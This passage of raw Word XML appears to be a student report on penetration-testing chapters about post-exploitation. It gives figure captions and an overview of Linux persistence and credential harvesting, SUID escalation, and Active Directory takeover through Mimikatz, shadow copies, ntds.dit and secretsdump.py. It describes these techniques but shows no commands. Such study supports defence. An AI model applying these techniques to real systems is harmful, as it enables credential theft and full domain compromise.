              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="798B8656" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 29 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="78AD97F6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="2B373AA7"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727EA5AF" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">29 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7FA7181E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 25: Accessing the shadow copy and verifying the NTDS database </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="48552651" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 30 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="05ABCF2A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="1B056612"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00D1DB95" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">30 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0DE19E7A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 26: Copying the ntds.dit file from the shadow copy </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="23895C68" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 30 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="67AAB598" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="6F3C2811" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="847"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3929743E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">31 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="065D2EBE" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 27: Copying the SYSTEM registry hive from the shadow copy </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3FD6D5B0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 31 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2FD0904A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="74907A25" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="850"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="71DA156D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">32 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5674DD2C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="1" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 28: Downloading the ntds.dit and SYSTEM files using smbclient.py </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C55D473" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 31 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="63C41618" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="63A941D2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1189"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65AADF11" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">33 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="673C724E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 29: Running secretsdump.py to begin extracting password hashes from the ntds.dit database using the SYSTEM registry hive </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="14FA0017" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 32 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="55E23F75" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F4EF8B7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="495" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A8861B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="390" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332D9CF1" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="390" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EA88F0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="390" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9452A6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="390" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0433A710" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="387" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9CD4EC" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A13FD8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401B20B4" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC26E0F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D051908" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="185" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679E0AD1" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3511D5A2" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc30408"/>
      <w:r>
        <w:t xml:space="preserve">Introduction </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="083D7C4D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="479"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapters 9 and 10 focus on the critical stages of post-exploitation in both Linux/UNIX and Windows Active Directory environments. After initial access is gained, the main objective is to </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">maintain persistence, gather sensitive information, and escalate privileges to achieve broader control of the network. These chapters demonstrate how attackers or penetration testers use built-in system tools and techniques to remain undetected while expanding access. Understanding these concepts is essential for identifying security weaknesses and improving system defenses. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D63E49" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc30409"/>
      <w:r>
        <w:t xml:space="preserve">Overview </w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="6B2045B7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="169"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 9 explains post-exploitation techniques in Linux and UNIX systems. It covers how access can be maintained using cron jobs and SSH tunnels, allowing automated and persistent connections to compromised systems. It also explores credential harvesting methods, such as analyzing hidden dot files, reviewing bash history, and accessing password hashes from the /etc/shadow file. Additionally, the chapter demonstrates privilege escalation using SUID binaries and shows how modifying system files like /etc/passwd can create root-level access. SSH keys are also highlighted as a method for lateral movement across systems. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F7D75" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="169"/>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 10 builds on these concepts in a Windows Active Directory environment, focusing on gaining full control of the domain. It begins with identifying domain admin accounts and locating systems where they are logged in. Once access is obtained, techniques such as token impersonation and credential extraction using tools like Mimikatz are used to elevate privileges. The chapter then explains how attackers access the domain controller, create volume shadow copies, and extract critical files such as ntds.dit and the SYSTEM registry hive. These files are used to retrieve password hashes for all domain users, ultimately allowing complete control of the network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631CD4A2" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6416309A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42537769" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1718CD77" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8F0B4C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B13DDF" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc30410"/>
      <w:r>
        <w:t xml:space="preserve">Chapter 9 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="219F76FF" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This chapter covers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA4C616" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
